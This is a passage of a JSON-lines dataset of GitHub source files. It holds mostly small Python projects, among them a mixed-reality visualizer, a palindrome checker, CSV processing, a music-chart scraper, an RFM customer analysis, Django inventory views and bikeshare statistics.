tpr[\"macro\"])\r\n\r\n plt.plot(\r\n fpr[\"macro\"],\r\n tpr[\"macro\"],\r\n label=f\"macro-average ROC curve (AUC = {roc_auc['macro']:.2f})\",\r\n color=\"navy\",\r\n linestyle=\":\",\r\n linewidth=4,\r\n )\r\n\r\n colors = cycle([\"aqua\", \"darkorange\", \"cornflowerblue\", \"lawngreen\"])\r\n for class_id, color in zip(range(n_classes), colors):\r\n RocCurveDisplay.from_predictions(\r\n testY,\r\n y_score[:, class_id],\r\n name=f\"{class_labels[class_id]} vs the rest\",\r\n color=color,\r\n pos_label=class_id,\r\n ax=ax,\r\n )\r\n\r\n plt.plot([0, 1], [0, 1], \"k--\", label=\"chance level (AUC = 0.5)\")\r\n plt.axis(\"square\")\r\n plt.xlabel(\"False Positive Rate\")\r\n plt.ylabel(\"True Positive Rate\")\r\n plt.title(\"One-vs-Rest ROC curves:\\n\")\r\n plt.legend()\r\n path = constants.MODELS_DATA_PATH + f\"BurstSize_{burst_size}\"\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n # plt.show()\r\n plt.savefig(path + \"/\" + \"One-vs-Rest ROC curves.png\")\r\n plt.close()\r\n\r\n\r\n def visualize_results(self,\r\n df_tracking_data_old: pd.DataFrame,\r\n df_tracking_data_preprocessed: pd.DataFrame,\r\n eye_data: EyeData,\r\n in_or_out_labels_eye_hit_pos: list[str],\r\n hand_data: HandData,\r\n in_or_out_labels_hand_pos: list[str],\r\n head_data: HeadData,\r\n instance_segmentation_data: InstanceSegmentationData,\r\n masks: np.array,\r\n user_name: str,\r\n intention: str,\r\n columns=1,\r\n rows=1,\r\n max_number_of_batches=50) -> None:\r\n \"\"\"\r\n For data understanding and debugging purposes\r\n \"\"\"\r\n mask_columns_joined = instance_segmentation_data.get_joined_mask_columns()\r\n class_labels = instance_segmentation_data.get_class_labels()\r\n class_probs = instance_segmentation_data.get_prob_labels()\r\n\r\n eye_hit_Pos_screen_space = eye_data.get_new_position_labels()[0]\r\n right_index_tip_Pos_screen_space = hand_data.get_new_position_labels()[0]\r\n left_index_tip_Pos_screen_space = hand_data.get_new_position_labels()[1]\r\n\r\n matplotlib.use('Agg')\r\n\r\n # batch some masks together in some plot\r\n batch_size = (columns * rows)\r\n # iterate over time\r\n saved_fig = 0\r\n for u in range(masks.shape[1] // batch_size):\r\n\r\n plt.axis('off')\r\n fig, axs = plt.subplots(rows, columns, figsize=(15, 15), squeeze=False)\r\n\r\n dataset = TruckDataSet()\r\n labels = dataset.get_labels()\r\n\r\n # plot multiple time steps at once\r\n for i in range(0, rows):\r\n for j in range(0, columns):\r\n\r\n axs[i, j].invert_yaxis()\r\n # ax1 = fig.add_subplot(rows, columns, i)\r\n global_index = u * batch_size + (i * columns + j)\r\n\r\n img_count = 0\r\n\r\n # iterate over all mask of a time step\r\n for m in range(len(mask_columns_joined)):\r\n\r\n # all masks from the #m instance segmentation mask\r\n masks_of_segmentation_result_m = masks[m]\r\n class_labels_of_segmentation_result_m = df_tracking_data_old[class_labels[m]]\r\n class_probs_of_segmentation_result_m = df_tracking_data_old[class_probs[m]]\r\n\r\n if (labels[class_labels_of_segmentation_result_m[global_index]] != \"platform\"):\r\n continue\r\n\r\n img_count += 1\r\n\r\n eye_hit_pos_in_or_out = df_tracking_data_preprocessed[in_or_out_labels_eye_hit_pos[0][m]].iloc[global_index]\r\n right_index_tip_pos_in_or_out = df_tracking_data_preprocessed[in_or_out_labels_hand_pos[0][m]].iloc[global_index]\r\n left_index_tip_pos_in_or_out = df_tracking_data_preprocessed[in_or_out_labels_hand_pos[1][m]].iloc[global_index]\r\n\r\n window_shape = (constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y, constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X)\r\n torch_resized = F.interpolate(input=torch.from_numpy(masks_of_segmentation_result_m[global_index])[None, None], size=window_shape, mode='bilinear', align_corners=False)[0]\r\n img = axs[i, j].imshow(torch_resized[0].numpy(), origin='upper')\r\n\r\n if (img_count == 0):\r\n break\r\n\r\n plt.title(f\"Segmentation masks \\n with projected user data in screen space \\nt = {u}\", fontsize=20)\r\n plt.colorbar(img, ax=axs[i, j], orientation='horizontal')\r\n\r\n eye_hit_pos_ndc = MathHelper.screen_space_to_ndc(np.array([(float)(df_tracking_data_preprocessed[eye_hit_Pos_screen_space[0]][global_index]),\r\n (float)(df_tracking_data_preprocessed[eye_hit_Pos_screen_space[1]][global_index])],\r\n dtype=float),\r\n np.array([constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X,\r\n constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y],\r\n dtype=int))\r\n\r\n right_index_tip_pos_ndc = MathHelper.screen_space_to_ndc(np.array([(float)(df_tracking_data_preprocessed[right_index_tip_Pos_screen_space[0]][global_index]),\r\n (float)(df_tracking_data_preprocessed[right_index_tip_Pos_screen_space[1]][global_index])],\r\n dtype=float),\r\n np.array([constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X,\r\n constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y],\r\n dtype=int))\r\n\r\n left_index_tip_pos_ndc = MathHelper.screen_space_to_ndc(np.array([(float)(df_tracking_data_preprocessed[left_index_tip_Pos_screen_space[0]][global_index]),\r\n (float)(df_tracking_data_preprocessed[left_index_tip_Pos_screen_space[1]][global_index])],\r\n dtype=float),\r\n np.array([constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_X,\r\n constants.MAX_RENDER_TARGET_SIZE_HOLOLENS2_Y],\r\n dtype=int))\r\n\r\n marker_size = 500\r\n axs[i, j].scatter(eye_hit_pos_ndc[0],\r\n eye_hit_pos_ndc[1],\r\n color='ghostwhite',\r\n s=marker_size,\r\n label=eye_hit_Pos_screen_space[0].split('(')[0])\r\n\r\n axs[i, j].scatter(right_index_tip_pos_ndc[0],\r\n right_index_tip_pos_ndc[1],\r\n color='orangered',\r\n marker='x',\r\n s=marker_size,\r\n label=right_index_tip_Pos_screen_space[0].split('(')[0])\r\n\r\n axs[i, j].scatter(left_index_tip_pos_ndc[0],\r\n left_index_tip_pos_ndc[1],\r\n color='g',\r\n marker='x',\r\n s=marker_size,\r\n label=left_index_tip_Pos_screen_space[0].split('(')[0])\r\n\r\n axs[i, j].set_xlabel('x-coord')\r\n axs[i, j].set_ylabel('y-coord')\r\n axs[i, j].legend(loc='lower left', fontsize='xx-large')\r\n\r\n fig.tight_layout()\r\n\r\n if (img_count == 0):\r\n continue\r\n\r\n path = constants.VISUALIZER_IMAGE_PATH + user_name + \"/\" + intention\r\n\r\n Path(path).mkdir(parents=True, exist_ok=True)\r\n\r\n plt.savefig(path + \"/\" + f\"instance_segmentation_masks_t_{saved_fig}.png\")\r\n saved_fig += 1\r\n\r\n plt.clf()\r\n plt.cla()\r\n plt.close(fig)\r\n","repo_name":"Kataglyphis/Designing-User-adaptive-Content-for-Mixed-Reality-Using-Eye-and-Hand-Tracking","sub_path":"UserGuidanceAI/visualization/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":21093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"30899051666","text":"# Program created by Brayan Vera. Date 07/12/21\n\n# Program name: Palindrome_Num_Identifier\n# -This program makes sure to accept only palindrome numbers.\n# -This means the number that is the same as reversed.\n# -This program returns True if palindrome number is entered,\n# returns False otherwise.\n# -This program does not accept negative numbers.\n# -Thisprogram does not accept strings.\n# Example:\n# 121 is good = True\n# 12321 is good = True\n# 122221 is good = True\n# 1211121 is good = True\n# 2222 is good = True\n# 1221 is good = True\n# -121 not valid = False\n\n# Found another technique:\n# -This program does not follow this technique, but we can also check last digit and first digit\n# incrementing and decrementing the indexes until we reach the middle and stop the program.\n\n# The way this program operates is by storing the input in a list that separates each digit\n# Then another list in reverse is created and in the end is compared to see if is a palindrome.\ndef palindrome_check(x):\n # Makes sure to not accept strings.\n if isinstance(x,str) == True:\n print(\"Invalid input, only numbers please, no string.\")\n return False\n # Makes sure does not accept negative numbers.\n if x < 0:\n print(\"Not valid, only possitive numbers please.\")\n return False\n\n # Conversts the number to a string.\n int_to_str = str(x)\n # To split each number value individually and placed them into a list.\n n = 1\n split_string = [int_to_str[index: index + n] for index in range(0, len(int_to_str), n)]\n #print(\"The first string: {}\".format(split_string))\n\n # Creating a new list to store the given list before it disappears when poping.\n store_old_str = []\n for store_old in split_string:\n store_old_str.append(store_old)\n\n new_list = []\n # Used to pop the last value of the old list and storing it into a new list.\n while len(split_string) != 0:\n last_val_pop = split_string.pop()\n new_list.append(last_val_pop)\n #print(\"The new list: {}\".format(new_list))\n\n #print(\"The old string is : {}\".format(store_old_str))\n #print(\"The new reversed string is : {}\".format(new_list))\n\n if store_old_str == new_list:\n print(\"Is a palindrome.\")\n return True\n else:\n print(\"Is not a palindrome.\")\n return False\n\ndef main():\n x = 155545 #Enter number here. \n palindrome_check(x)\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"blvera/Brayan-Vera-Projects","sub_path":"My LeetCode - Python solved problems/Palindrome_Num_Identifier.py","file_name":"Palindrome_Num_Identifier.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"17700881463","text":"import csv\n\n# open up numbers.csv\ncsv_file = open(\"numbers.csv\", \"r\")\ncsv_reader = csv.reader(csv_file)\n\n# open up reverse.csv\ncsv_new = open('reverse.csv', 'w')\ncsv_writer = csv.writer(csv_new)\n\n# take reversed csv_reader and dump into csv_writer\nfor row in csv_reader:\n row.reverse()\n csv_writer.writerow(row)\n\n# close both files, need to reopen csv_new as a read file\ncsv_file.close()\ncsv_new.close()\n\nwith open('reverse.csv', 'r') as reverseRows:\n for row in list(csv.reader(reverseRows)):\n # reset sum for each row\n sum = 0\n # for loop for each data point (30 columns) making sum for each row\n for i in range(30):\n sum += int(row[i])\n # average equation for each row\n average = float(sum / 30)\n # print that average, formatted to 2 decimal points\n print(\"The average for this row is: {:0.2f}\".format(average))\n\n\n","repo_name":"drewgillis9/Gillis_LMSC_261_ProblemSets","sub_path":"ProblemSet10/ProblemSet10.2.py","file_name":"ProblemSet10.2.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"27366390338","text":"import datetime\nimport json\n\nfrom common.automator_client import client\nfrom common.repos import ALL_REPOS\n\n\ndef get_items(org, repo, item_type):\n query_params = {\n \"org\": org,\n \"repo\": repo,\n \"item_type\": item_type,\n \"states[]\": ['CLOSED'],\n \"limit[]\": ['first', '100']\n }\n response = client.github.items.get(query_params=query_params)\n return json.loads(response.body)\n\n\ntotal_closed_prs = 0\nfor org in ALL_REPOS:\n for repo in ALL_REPOS[org]:\n items = get_items(org, repo, 'pull_requests')\n for item in items:\n closed_at = datetime.datetime.strptime(item['closedAt'], '%Y-%m-%dT%H:%M:%SZ')\n text = \"{}, {} , {}, {}, {}\".format(repo, item['url'], item['points'],\n item['reviewer_points'], closed_at.date())\n print(text)\n total_closed_prs = total_closed_prs + 1\n\nprint(\"There were a total of {} closed prs across all repos\".format(total_closed_prs))\n","repo_name":"sendgrid/dx-automator","sub_path":"examples/closed_prs.py","file_name":"closed_prs.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"38"} +{"seq_id":"71757895472","text":"from bs4 import BeautifulSoup\nimport csv\nimport requests\nfrom pprint import pprint\n\nmelon_url = 'https://www.melon.com/chart/index.htm'\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'\n}\n\nresponse = requests.get(melon_url, headers=headers).text\n# pprint(response)\n\ndata = BeautifulSoup(response, 'html.parser')\n# print(data)\n\nsongs = data.select('#lst50')\n# print(songs)\n\nresult_list = []\nfor song in songs:\n rank = song.select_one('td:nth-child(2) > div > span.rank').text\n name = song.select_one('td:nth-child(6) > div > div > div.ellipsis.rank01 > span > a').text\n # artist = song.select_one('td:nth-child(6) > div > div > div.ellipsis.rank02 > a').text\n # artists = song.select('td:nth-child(6) > div > div > div.ellipsis.rank02 > a')\n artists = song.select('td:nth-child(6) > div > div > div.ellipsis.rank02 > span.checkEllipsis')\n # result_dict = {'rank': rank, 'name': name, 'artist': artist}\n # result_dict = {'rank': rank, 'name': name, 'artist': ','.join([artist.text for artist in artists])}\n result_dict = {'rank': rank, 'name': name, 'artist': [artist.text for artist in artists]}\n result_list.append(result_dict)\n# print(result_list)\n\nwith open('melon_rank_01.csv', 'w', encoding='utf-8', newline='') as csvfile:\n fieldnames = ('rank','name','artist')\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n for item in result_list:\n writer.writerow(item)","repo_name":"athletejuan/TIL","sub_path":"Python/SS4th/StartCamp/Write_Read/csv/practice/melon_rank_01.py","file_name":"melon_rank_01.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"11472003479","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport numpy as np\r\nimport warnings\r\nimport seaborn as sns\r\nimport plotly as py\r\nimport plotly.graph_objs as go\r\nimport plotly.offline as py\r\npy.offline.init_notebook_mode()\r\nwarnings.filterwarnings('ignore')\r\npd.set_option('display.max_columns',None)\r\nfile_path = './data.csv'\r\ndf = pd.read_csv(file_path)\r\n#print(df.head())\r\n#print(df.info())\r\n#print(df[df['InvoiceNo'].str[0] == 'C'])\r\n\r\n\r\n#数据清洗\r\nprint(df.apply(lambda x:sum(x.isnull())/len(x),axis=0))\r\ndf.drop(['Description'],axis=1,inplace=True)\r\n#print(df)\r\ndf['CustomerID'] = df['CustomerID'].fillna('U')\r\ndf['amount'] = df['Quantity']*df['UnitPrice']\r\n#print(df.info())\r\ndf['date']= [i.split(' ')[0] for i in df['InvoiceDate']]\r\n# df['InvoiceDate'] = pd.to_datetime(df['InvoiceDate'])\r\n# df['date'] = [i.strftime('%d-%m-%Y') for i in df['InvoiceDate']]\r\n\r\n# print(df.info())\r\n# print(df.head())\r\ndf['time'] = [i.split(' ')[1] for i in df['InvoiceDate']]\r\n#print(df[['time','date']])\r\ndf.drop(['InvoiceDate'],axis=1,inplace=True)\r\n#print(df['date'].head())\r\ndf['year'] = [i.split('/')[2] for i in df['date']]\r\ndf['month'] = [i.split('/')[0] for i in df['date']]\r\ndf['day'] = [i.split('/')[1] for i in df['date']]\r\n#print(df[['date','year','month','day']].head())\r\ndf['date'] = pd.to_datetime(df['date'])\r\ndf = df.drop_duplicates()\r\n# print(df.describe())\r\ndf2 = df.loc[df['UnitPrice']<=0]\r\n# print(df2.shape[0]/df.shape[0])\r\n# print(df2['UnitPrice'].groupby(by=df2['UnitPrice']).count())\r\n\r\n#数据分析\r\ndf1 = df.loc[(df['Quantity']<=0)]\r\ntt = pd.pivot_table(df1, index='year',columns = 'month', values = 'amount', aggfunc= np.sum)\r\n# print(tt)\r\ndf2 = df[(df['Quantity']>0) & (df['UnitPrice']>0)]\r\npp = pd.pivot_table(df2, index='year',columns = 'month', values = 'amount', aggfunc= np.sum)\r\n# print(pp)\r\n# print(np.abs(tt/pp))\r\nnp.abs(tt/pp).loc['2011'].mean()\r\n\r\n#画图(已解决)\r\n\r\nR_value = df.groupby('CustomerID')['date'].max()\r\ndf2['date'].max()\r\nR_value = (df2['date'].max()-R_value).dt.days\r\nF_value = df2.groupby('CustomerID')['InvoiceNo'].nunique()\r\nM_value = df2.groupby('CustomerID')['amount'].sum()\r\nsns.set(style = 'darkgrid')\r\n# plt.hist(R_value)\r\n# plt.show()\r\nR_bins = [0,30,90,180,360,720]\r\nF_bins = [1,2,5,10,20,5000]\r\nM_bins = [0,55,2000,5000,10000,200000]\r\nR_score = pd.cut(R_value,R_bins,labels=[5,4,3,2,1],right=False)\r\n#print(R_score)\r\nF_score = pd.cut(F_value,F_bins,labels=[1,2,3,4,5],right=False)\r\nM_score = pd.cut(M_value,M_bins,labels=[1,2,3,4,5],right=False)\r\nrfm = pd.concat([R_score,F_score,M_score],axis=1)\r\n#print(F_score.shape,M_score.shape,R_score.shape)\r\n# print(rfm)\r\nrfm.rename(columns={'date':'R_score','InvoiceNo':'F_score','amount':'M_score'},inplace=True)\r\nfor i in ['R_score','F_score','M_score']:\r\n rfm[i] = rfm[i].astype(float)\r\nrfm['R'] = np.where(rfm['R_score']>3.82,'高','低')\r\nrfm['F'] = np.where(rfm['F_score']>2.03,'高','低')\r\nrfm['M'] = np.where(rfm['M_score']>1.8,'高','低')\r\nrfm['value'] = rfm['R'].str[:] +rfm['F'].str[:] + rfm['M'].str[:]\r\n#print(rfm.info())\r\ndef trans_value(x):\r\n if x == '高高高':\r\n return '重要价值客户'\r\n elif x=='高低高':\r\n return '重要发展客户'\r\n elif x== '低高高':\r\n return '重要保持客户'\r\n elif x== '低低高':\r\n return '重要挽留客户'\r\n elif x=='高高低':\r\n return '一般价值客户'\r\n elif x== '高低低':\r\n return '一般发展客户'\r\n elif x=='低高低':\r\n return '一般保持客户'\r\n else:\r\n return '一般挽留客户'\r\n\r\nrfm['用户等级'] = rfm['value'].apply(trans_value)\r\nrfm['用户等级'].value_counts()\r\ntrade_basic = [go.Bar(x = rfm['用户等级'].value_counts().index, y=rfm['用户等级'].value_counts().values,marker = dict(color='orange'),opacity=0.50)]\r\nlayout = go.Layout(title='用户等级情况',xaxis = dict(title='用户重要度'))\r\nfigure_basic = go.Figure(data= trade_basic,layout=layout)\r\npy.plot(figure_basic)\r\n# trace = [go.Pie(labels= rfm['用户等级'].value_counts().index, values=rfm['用户等级'].value_counts().values,textfont=dict(size=12,color='white'))]\r\n# layout2 = go.Layout(title='用户等级比例')\r\n# figure_basic2 = go.Figure(data= trace,layout=layout2)\r\n# py.plot(figure_basic2)\r\n\r\n#结论和建议\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"HarCP3/data-analysis","sub_path":"ecommerce.py","file_name":"ecommerce.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26621470227","text":"from django.shortcuts import render\nfrom rest_framework import viewsets, generics, permissions, views, exceptions, response\n\nfrom . import models as inv_model\nfrom . import serializers as inv_serializer\n\nfrom account.models import UserMixIn\nfrom account.permissions import IsStoreManager\n\n\nclass InventoryView(viewsets.ModelViewSet):\n model = inv_model.Inventory\n queryset = model.objects.all()\n serializer_class = inv_serializer.InventorySerilizer\n\n def perform_create(self, serializer):\n user = self.request.user\n if UserMixIn.is_user_store_manager(user):\n serializer.validated_data['status'] = inv_model.Inventory.ACCEPT\n elif UserMixIn.is_user_department_manager(user):\n serializer.validated_data['status'] = inv_model.Inventory.PENDING\n serializer.validated_data['action'] = inv_model.Inventory.CREATE\n serializer.save()\n\n def perform_update(self, serializer):\n user = self.request.user\n if UserMixIn.is_user_store_manager(user):\n serializer.validated_data['status'] = inv_model.Inventory.ACCEPT\n elif UserMixIn.is_user_department_manager(user):\n serializer.validated_data['status'] = inv_model.Inventory.PENDING\n serializer.validated_data['action'] = inv_model.Inventory.UPDATE\n serializer.save()\n\n def perform_destroy(self, serializer):\n user = self.request.user\n if UserMixIn.is_user_store_manager(user):\n serializer.validated_data['status'] = inv_model.Inventory.ACCEPT\n elif UserMixIn.is_user_department_manager(user):\n serializer.validated_data['status'] = inv_model.Inventory.PENDING\n serializer.validated_data['action'] = inv_model.Inventory.DELETE\n serializer.save()\n\n\nclass AccepetRejectInventory(views.APIView):\n \"\"\" accept or reject inventory\"\"\"\n permission_classes = (\n permissions.IsAuthenticated, IsStoreManager,\n )\n\n def post(self, request, *args, **kwargs):\n action_name = kwargs['action_type']\n try:\n inventory = inv_model.Inventory.objects.get(id=kwargs['id'])\n except inv_model.Inventory.DoesNotExist:\n raise exceptions.ParseError({'details':\"Invalid id\"})\n \n if action_name == \"accept\":\n update_data = inventory.update_data\n for key, value in update_data:\n setattr(inventory, key, value)\n inventory.status = inv_model.Inventory.ACCEPT\n inventory.save()\n else:\n inventory.status = inv_model.Inventory.PENDING\n inventory.save()\n return response.Response({'details': \"Inventroy updated successfully.\"})\n","repo_name":"aman0511/coin-drive-test","sub_path":"inventory/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"4331740108","text":"import time\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nCITY_DATA = {'chicago': 'chicago.csv',\r\n 'new york city': 'new_york_city.csv',\r\n 'washington': 'washington.csv'}\r\n\r\n\r\ndef get_filters():\r\n \"\"\"\r\n Asks user to specify a city, month, and day to analyze.\r\n\r\n Returns:\r\n (str) city - name of the city to analyze\r\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\r\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\r\n \"\"\"\r\n print('Hello! Let\\'s explore some US bikeshare data!')\r\n # TO DO: get user input for city (chicago, new york city, washington). HINT: Use a while loop to handle\r\n while True:\r\n city = input(\"\\nEnter the name of city you need (chicago, new york city, washington):\").lower()\r\n if city in ['chicago', 'new york city', 'washington']:\r\n break\r\n else:\r\n print(\"\\n Ops,Please Enter valid city name\")\r\n\r\n # TO DO: get user input for month (all, january, february, ... , june)\r\n while True:\r\n month = input(\"\\n Enter which month you need ( january, february, march, april, may, june) Or (all) to all monthes :\").lower()\r\n if month in ('all', 'january', 'february', 'march', 'april', 'may', 'june'):\r\n break\r\n else:\r\n print(\"\\n Ops,Please Enter valid month name\")\r\n\r\n # get user input for day of week (all, monday, tuesday, ... sunday)\r\n while True:\r\n day = input(\"\\n Enter which day you need (monday, tuesday, wednesday, thursday, friday, saturday, sunday) Or (all) to all days :\").lower()\r\n if day in ('all', 'monday', 'tuesday', 'wednesday', 'thursday', 'friday', 'saturday', 'sunday'):\r\n break\r\n else:\r\n print(\"\\n Ops,Please Enter valid day name\")\r\n\r\n print('-'*40)\r\n return city, month, day\r\n\r\n\r\ndef load_data(city, month, day):\r\n \"\"\"\r\n Loads data for the specified city and filters by month and day if applicable.\r\n\r\n Args:\r\n (str) city - name of the city to analyze\r\n (str) month - name of the month to filter by, or \"all\" to apply no month filter\r\n (str) day - name of the day of week to filter by, or \"all\" to apply no day filter\r\n Returns:\r\n df - Pandas DataFrame containing city data filtered by month and day\r\n \"\"\"\r\n# i used it from project 3\r\n# load data file into a dataframe\r\n df = pd.read_csv(CITY_DATA[city])\r\n\r\n # convert the Start Time column to datetime\r\n df['Start Time'] = pd.to_datetime(df['Start Time'])\r\n\r\n # extract month , day and hour of week from Start Time to create new columns\r\n df['month'] = df['Start Time'].dt.month\r\n df['day_of_week'] = df['Start Time'].dt.weekday_name\r\n df['start hour'] = df['Start Time'].dt.hour\r\n\r\n # filter by month if applicable\r\n if month != 'all':\r\n # use the index of the months list to get the corresponding int\r\n months = ['january', 'february', 'march', 'april', 'may', 'june']\r\n month = months.index(month) + 1\r\n\r\n # filter by month to create the new dataframe\r\n df = df[df['month'] == month]\r\n\r\n # filter by day of week if applicable\r\n if day != 'all':\r\n # filter by day of week to create the new dataframe\r\n df = df[df['day_of_week'] == day.title()]\r\n\r\n return df\r\n\r\n\r\ndef time_stats(df):\r\n \"\"\"Displays statistics on the most frequent times of travel.\"\"\"\r\n\r\n print('\\nCalculating The Most Frequent Times of Travel...\\n')\r\n start_time = time.time()\r\n\r\n # TO DO: display the most common month\r\n print(\" \\nMost common month is:\", df['month'].mode()[0])\r\n\r\n # TO DO: display the most common day of week\r\n print(\" \\nMost common day is:\", df['day_of_week'].mode()[0])\r\n\r\n # TO DO: display the most common start hour\r\n print(\" \\nMost common start hour is:\", df['start hour'].mode()[0])\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef station_stats(df):\r\n \"\"\"Displays statistics on the most popular stations and trip.\"\"\"\r\n\r\n print('\\nCalculating The Most Popular Stations and Trip...\\n')\r\n start_time = time.time()\r\n # TO DO: display most commonly used start station\r\n print(\"\\n Most commonly used start station is:\",df['Start Station'].mode()[0])\r\n\r\n # TO DO: display most commonly used end station\r\n print(\"\\n Most commonly used end station is:\", df['End Station'].mode()[0])\r\n\r\n # TO DO: display most frequent combination of start station and end station trip\r\n df['start_to_end'] = df['Start Station']+' ' + df['End Station']\r\n most_start_toend = df['start_to_end'].mode()[0]\r\n print(\"\\n Most frequent combination of start station and end station trip:\", most_start_toend)\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef trip_duration_stats(df):\r\n \"\"\"Displays statistics on the total and average trip duration.\"\"\"\r\n\r\n print('\\nCalculating Trip Duration...\\n')\r\n start_time = time.time()\r\n\r\n # TO DO: display total travel time\r\n print(\"\\n Total travel time:\", df['Trip Duration'].sum())\r\n\r\n # TO DO: display mean travel time\r\n print(\"\\n Mean travel time:\", df['Trip Duration'].mean())\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef user_stats(df):\r\n \"\"\"Displays statistics on bikeshare users.\"\"\"\r\n\r\n print('\\nCalculating User Stats...\\n')\r\n start_time = time.time()\r\n\r\n # TO DO: Display counts of user types\r\n try:\r\n print(\"\\n Gender\", df['Gender'].value_counts())\r\n except:\r\n print(\"\\n Ops,there is no data about gender in this city\")\r\n\r\n # TO DO: Display earliest, most recent, and most common year of birth\r\n try:\r\n print(\"\\nEarliest common year of birth\", int(df['Birth Year'].min()))\r\n except:\r\n print(\"\\n Ops,there is no data about year of birth in this city\")\r\n\r\n try:\r\n print(\"\\nMost recent common year of birth\",int(df['Birth Year'].max()))\r\n except:\r\n print(\"\\n Ops,there is no data about year of birth in this city\")\r\n\r\n try:\r\n print(\"\\nMost common common year of birth\",int(df['Birth Year'].mode()[0]))\r\n except:\r\n print(\"\\n Ops, there is no data about year of birth in this city\")\r\n\r\n print(\"\\nThis took %s seconds.\" % (time.time() - start_time))\r\n print('-'*40)\r\n\r\n\r\ndef display_rows(df):\r\n # ask user to display 5 rowes of data\r\n x = 0\r\n while True:\r\n ask = input(\"Are you need to display next 5 rows of data?\\n choice(yes or no):\").lower()\r\n if ask != 'yes' and ask != 'no':\r\n print(\"\\n Ops ,wrong choice,pleas choice (yes or not)\")\r\n elif ask == 'no':\r\n break\r\n else:\r\n if x+5 < df.shape[0]:\r\n print(df.iloc[x:x+5])\r\n x += 5\r\n\r\n\r\ndef main():\r\n while True:\r\n city, month, day = get_filters()\r\n df = load_data(city, month, day)\r\n\r\n time_stats(df)\r\n station_stats(df)\r\n trip_duration_stats(df)\r\n user_stats(df)\r\n display_rows(df)\r\n\r\n restart = input('\\nWould you like to restart? Enter yes or no.\\n')\r\n if restart.lower() != 'yes':\r\n break\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"AhmedAbdelhamed01/Bikeshare-Data","sub_path":"bikeshare.py","file_name":"bikeshare.py","file_ext":"py","file_size_in_byte":7290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"3887481233","text":"metadata = \"\"\"\nsummary @ Digital distribution client bootstrap package\nhomepage @ http://steampowered.com/\nlicense @ custom\nsrc_url @ http://repo.steampowered.com/steam/pool/steam/s/steam/steam_1.0.0.50.tar.gz\narch @ ~x86_64\noptions @ nls static-libs threads\n\"\"\"\n\nstandard_procedure = False\n\nsrcdir =\"%s\" %name\n\ndef prepare():\n patch(level=1)\n\n\ndef build():\n make()\n \n \ndef install():\n raw_install('DESTDIR=%s' % install_dir)\n # insdoc('AUTHORS', 'LICENSE', 'NEWS', 'README', 'THANKS')\n","repo_name":"wdysln/new","sub_path":"app-games/steam/steam-1.0.0.50.py","file_name":"steam-1.0.0.50.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"34696255666","text":"from pony.orm import Required, Database, set_sql_debug\n\nfrom settings import DB_CONFIG\n\ndb = Database()\n# PostgreSQL\ndb.bind(**DB_CONFIG)\n\n\nclass UserTasks(db.Entity):\n user_id = Required(int)\n name = Required(str)\n date = Required(str)\n task = Required(str)\n\n\ndb.generate_mapping(create_tables=True)\nset_sql_debug(True)\n# UserTasks.get(user_id = 123321)\n","repo_name":"kallarias/tg_bot","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"16269580977","text":"import torch\nimport rasterio as rio\nimport pandas as pd\nimport geopandas as gpd\nimport os\nfrom skimage.morphology import binary_opening\nimport numpy as np\nfrom rasterio import features\nfrom shapely.geometry import shape\nfrom shapely.geometry import Polygon\n\nfrom itertools import product\nimport numpy as np\nimport geopandas as gpd\nfrom torch.utils.data import Dataset\nfrom glob import glob\nfrom torchvision.transforms import Resize\nimport torchvision\nimport rasterio\nfrom torchvision.transforms.functional import resize\nimport numpy as np\nfrom scipy.stats import skewcauchy\nfrom tqdm import tqdm\nfrom copy import copy\n\nBANDS = [\"B01\", \"B02\", \"B03\", \"B04\", \"B05\", \"B06\", \"B07\", \"B08\", \"B8A\", \"B09\", \"B10\", \"B11\", 